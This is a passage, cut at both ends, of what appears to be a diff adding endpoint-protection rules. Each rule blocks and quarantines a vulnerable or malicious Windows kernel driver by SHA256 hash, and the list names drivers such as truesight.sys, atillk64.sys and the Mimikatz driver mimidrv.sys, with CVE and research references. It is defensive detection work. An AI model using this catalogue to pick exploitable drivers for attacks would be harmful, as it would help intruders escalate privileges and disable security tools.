"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499162Z", + "creation_date": "2026-03-23T11:45:31.499165Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499173Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bff977eab714911c400790b58513565952885cb348237de101a172474016cf64", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "082b28c9-c335-5397-af2b-d62ebfaeb8d4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815011Z", + "creation_date": "2026-03-23T11:45:31.815014Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815023Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2c3cf064c8167dc82ee144f01483c4b870252318d23c1d1439cdcc36bbe639a4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "08318274-0a03-57b7-a98a-aa4a6031b930", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617323Z", + "creation_date": "2026-03-23T11:45:29.617325Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617331Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "248dcc72d799d350d30b0f9e9ae93389cdcd11b43e38949ba9be414400657587", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "083bb25d-92c0-5ecf-891b-4a75f07b4bd5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153924Z", + "creation_date": 
"2026-03-23T11:45:31.153926Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153932Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "93df5db6037d76c3dabdb6b8dd384665f62ae8381d24b35e220fee93c2c715d7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "083f4573-950b-5aa8-abf6-0deae5fc923f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488292Z", + "creation_date": "2026-03-23T11:45:31.488294Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488300Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f7afd13d94d7c73dc4585456c1fb2abbecdc154434198f8a19a7950b724382b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "084330c4-8397-5052-84fd-e91be2d9b91c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828632Z", + "creation_date": "2026-03-23T11:45:30.828634Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828639Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1b2ef93d0b7bba53f358dc2f7bdc1033c1925842966f21f8a6ccb2b3fe30065e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "08486284-66b1-5497-b97e-82a02a91d22e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616939Z", + "creation_date": "2026-03-23T11:45:29.616948Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616958Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "96cb847fab0befab75a6f39080dd444d022d4bec73017c9d7187fe6282a0faa1", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "08603510-e98f-56f5-906b-7f210979c9f6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811701Z", + "creation_date": "2026-03-23T11:45:31.811705Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811713Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b292a62ad8f320fcf9327b1bde23c360b843778c905a0b0633ea30044a6a7457", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0862fa33-7f89-5c24-88c8-70226a1264b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810769Z", + "creation_date": "2026-03-23T11:45:31.810771Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810778Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d6a09e5c1b36a57a0aa46f469b52dbc60df21cfb92985a7abf26104996b6d5dc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "086618ac-fcc9-5e93-ac97-83dc65dd6962", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617431Z", + "creation_date": "2026-03-23T11:45:29.617433Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617438Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "be66f3bbfed7d648cfd110853ddb8cef561f94a45405afc6be06e846b697d2b0", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "087404c1-b0b2-5fd4-b89c-246111c321c5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143927Z", + "creation_date": "2026-03-23T11:45:31.143929Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143935Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "deee9c8f018d7d2fa18e5409ebfc85dca0dd9600b94774f998ef0cd5bce77080", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0874a627-74b7-5900-a9e5-d756636da0a2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498684Z", + "creation_date": "2026-03-23T11:45:31.498687Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498696Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "46dae2e1e9e040eec78cbf74c5b7adf5e34796e94869de2668c47c770f1c4ab3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "08828464-2abd-5763-9d16-8ab03b62390b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465057Z", + "creation_date": "2026-03-23T11:45:30.465060Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465068Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6964a5d85639baee288555797992861232e75817f93028b50b8c6d34aa38b05b", + "comment": 
"Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "08832b6b-d7db-5517-9dfd-1f031ccee6cd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980664Z", + "creation_date": "2026-03-23T11:45:29.980666Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980671Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "def61560c0650717cb1da923f0d674b363b8f2051247719b34f06744bbb79000", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0884b735-d5f9-5bd1-8f5a-d4247e2ef3ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980621Z", + "creation_date": 
"2026-03-23T11:45:29.980624Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980633Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "af9c600edb134fb8f21d585bbf7d0a4d3f1b792b6dd104c10d38f220f47671f8", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "088e8227-4f7f-5737-b5ba-ad3afd6c2d85", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982432Z", + "creation_date": "2026-03-23T11:45:29.982434Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982439Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9c6213a8222f087be42f493e37edf17e261e9afa0c832d05f3f1f54a318f60d2", + "comment": "Vulnerable Kernel Driver (aka windows7-32.sys) [https://www.loldrivers.io/drivers/b45a3fdf-592a-4cd9-81e2-8fe03d554cad/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "089e5840-ad92-5edc-8191-b5c53fb79121", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491654Z", + "creation_date": "2026-03-23T11:45:31.491657Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491664Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad6b609b08a46738958bdcd3158b2697934fbb65ddb15b59bb1fe9810b7578b8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "089f5567-cea7-5a45-bb55-c00308a7b090", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976173Z", + "creation_date": "2026-03-23T11:45:29.976175Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976181Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104", + "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "08a8b7b8-39d6-5e3b-a1e4-482bb4a1544b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810593Z", + "creation_date": "2026-03-23T11:45:31.810595Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810601Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "78086b63e901f3f8d086a54b6e3868494026520843463ba084e48e1271b295dd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "08c1369b-4330-5170-9a55-21041727e016", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
"moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830420Z", + "creation_date": "2026-03-23T11:45:30.830422Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830428Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "32b7268733588e5884d01ab8a29bae20ce6d412711950281774dd727ff7fdbf2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "08cbe670-69a1-518c-a194-467265f6cf8e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612266Z", + "creation_date": "2026-03-23T11:45:29.612268Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612273Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "08f48dfd-3718-5538-9db9-331f5068241b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807965Z", + "creation_date": "2026-03-23T11:45:31.807968Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807976Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "78d78ad77ac2cae14b0faf8638c5fd649afef26bbc0893ae35987dac465b4bc1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0924a07f-49fa-5aa8-ac72-8adb0447f984", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820030Z", + "creation_date": "2026-03-23T11:45:30.820032Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820037Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2affa6b703f0491a44d6b7b09dfab83b36ac06979810665aaf7dd2913964c44d", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "092bf522-64cf-58d7-9ec6-21bd8a63ff22", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454182Z", + "creation_date": "2026-03-23T11:45:30.454186Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454195Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "75e539170a00e447842a85441be36dc9e1fa81a3f6386806f3d90e7b4cca1ac1", + "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/bc5e020a-ecff-43c8-b57b-ee17b5f65b21/] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "093050fb-e014-5b6c-bc7a-eaec7e6d2bed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459680Z", + "creation_date": "2026-03-23T11:45:30.459684Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459692Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a2096b460e31451659b0dde752264c362f47254c8191930bc921ff16a4311641", + "comment": "Vulnerable Kernel Driver (aka viragt.sys) [https://www.loldrivers.io/drivers/39742f99-2180-46d7-8538-56667c935cc3/] [file SHA256]", + "source": 